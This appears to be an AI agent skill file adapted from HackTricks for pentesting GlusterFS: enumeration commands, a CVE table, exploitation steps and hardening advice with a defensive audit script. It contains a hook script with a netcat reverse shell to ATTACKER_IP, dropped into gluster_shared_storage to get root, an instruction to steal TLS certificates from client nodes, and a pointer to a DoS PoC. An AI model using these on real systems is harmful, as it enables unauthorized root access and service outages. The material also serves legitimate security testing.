Hacktricks-skills glusterfs-pentest

Pentest GlusterFS distributed file systems. Use this skill whenever you encounter ports 24007, 24008, 24009, or 49152+ in a scan, or when the user mentions GlusterFS, distributed storage, glusterd, or gluster-brick. This skill covers enumeration, exploitation of known CVEs (2022-2025), privilege escalation via gluster_shared_storage, and hardening recommendations.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs/SKILL.MD
source content

GlusterFS Pentesting

A skill for assessing GlusterFS distributed file systems, including enumeration, exploitation of known vulnerabilities, and hardening guidance.

What is GlusterFS?

GlusterFS is a distributed file system that combines storage from multiple servers into one unified namespace. Key ports:

| Port | Service | Purpose |
|---|---|---|
| 24007/TCP | glusterd | Management daemon (RPC) |
| 24008-24009/TCP | gluster-brick | Legacy brick transport (pre-9.x) |
| 49152+/TCP | gluster-brick | Data-plane bricks (one per brick, incrementing) |

Tip: Port 24007 answers RPC calls even when storage-only nodes don't export volumes, making it a reliable pivot target in large infrastructures.

Prerequisites

Install client utilities on your attacking box:

# Debian/Ubuntu
sudo apt install -y glusterfs-cli glusterfs-client

# RHEL/CentOS
sudo yum install -y glusterfs-cli glusterfs-fuse

Enumeration

1. Peer Discovery & Health

List peers (works without authentication in default setups):

gluster --remote-host <TARGET_IP> peer status

2. Volume Reconnaissance

Retrieve all volumes and their configuration:

gluster --remote-host <TARGET_IP> volume info all

3. Mount Without Privileges

sudo mount -t glusterfs <TARGET_IP>:/<VOL_NAME> /mnt/gluster

If mounting fails, check /var/log/glusterfs/<vol_name>-<uid>.log on the client. Common issues:

  • TLS enforcement (option transport.socket.ssl on)
  • Address-based access control (option auth.allow <cidr>)

Certificate Troubleshooting

If TLS is required, steal these files from any authorized client node and place them in /etc/ssl/:

/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca

Known Vulnerabilities (2022-2025)

| CVE | Affected Versions | Impact | Notes |
|---|---|---|---|
| CVE-2022-48340 | 10.0–10.4, 11.0 | Use-after-free in dht_setxattr_mds_cbk | Remote DoS and probable RCE. Fixed in 10.4.1 / 11.1 |
| CVE-2023-26253 | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available |
| CVE-2023-3775 | < 10.5 / 11.1 | Incorrect permission validation on gluster_shared_storage | Lets any unauthenticated client mount the admin volume; leads to priv-esc |

Always check gluster --version on every node; heterogeneous clusters are common after partial upgrades.

Exploitation

Privilege Escalation via gluster_shared_storage

Many administrators leave the special gluster_shared_storage volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run with root on every node.

# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs <TARGET_IP>:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronized cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root

If hooks/1/ is not present, look for /ss_bricks/; the exact path may vary with the major version.

Denial-of-Service (CVE-2023-26253)

Use the bundled script to crash glusterfsd < 11.0:

# Run the DoS PoC
./scripts/gluster-dos-poc.py <TARGET_IP>

This sends a malformed NOTIFY_REPLY XDR frame to port 24007.

Hardening & Detection

For Defenders

  1. Upgrade – Current LTS is 11.1 (July 2025). All CVEs above are fixed.

  2. Enable TLS for every brick:

    gluster volume set <vol> transport.socket.ssl on
    gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
    
  3. Restrict clients with CIDR lists:

    gluster volume set <vol> auth.allow 10.0.0.0/24
    
  4. Expose management port 24007 only on a private VLAN or through SSH tunnels.

  5. Watch logs:

    tail -f /var/log/glusterfs/glusterd.log
    gluster volume set <vol> features.audit-log on
    
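As an added defender-side check that is not part of the original skill, this Python script parses `gluster volume info all` output and flags every volume that lacks the TLS and auth.allow settings listed above, calling out gluster_shared_storage specifically. The sample output is constructed, and the option names and the assumed defaults when an option is unset (TLS off, any address allowed) come from this page rather than from a live cluster.

```python
# Constructed sample (not captured from a real cluster); the layout follows the
# "Key: value" blocks that `gluster volume info` prints, one block per volume.
SAMPLE_VOLUME_INFO = """\
Volume Name: data01
Type: Replicate
Status: Started
Bricks:
Brick1: node1:/bricks/data01
Brick2: node2:/bricks/data01
Options Reconfigured:
transport.socket.ssl: on
auth.allow: 10.0.0.0/24

Volume Name: gluster_shared_storage
Type: Replicate
Bricks:
Brick1: node1:/var/lib/glusterd/ss_brick
Options Reconfigured:
auth.allow: *
"""

def parse_volume_info(text):
    """Return {volume_name: {option: value}} from `gluster volume info` output."""
    volumes, name, in_opts = {}, None, False
    for line in text.splitlines():
        if line.startswith("Volume Name:"):
            name = line.split(":", 1)[1].strip()
            volumes[name] = {}
            in_opts = False          # options for this volume come later
        elif line.startswith("Options Reconfigured:"):
            in_opts = True
        elif in_opts and name and ":" in line:
            key, value = (part.strip() for part in line.split(":", 1))
            volumes[name][key] = value
    return volumes

def audit_volume(name, options):
    """Flag the settings the Hardening section tells defenders to fix."""
    findings = []
    # Assumed defaults when an option is unset: TLS off, any address allowed.
    if options.get("transport.socket.ssl", "off").lower() != "on":
        findings.append("TLS not enforced (transport.socket.ssl is not 'on')")
    if options.get("auth.allow", "*").strip() in ("", "*"):
        findings.append("auth.allow permits any client address")
    if name == "gluster_shared_storage" and findings:
        findings.append("admin volume exposed; its hooks run as root on every node")
    return findings

def audit(text):
    return {n: audit_volume(n, o) for n, o in parse_volume_info(text).items()}
```

Feed it the real output with `gluster volume info all | python3 audit.py` after replacing SAMPLE_VOLUME_INFO with `sys.stdin.read()`.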

Workflow Summary

  1. Scan for ports 24007, 24008, 24009, 49152+
  2. Enumerate with gluster peer status and gluster volume info all
  3. Check version to identify vulnerable CVEs
  4. Attempt mount of volumes (especially gluster_shared_storage)
  5. Exploit based on version and configuration
  6. Document findings and hardening recommendations
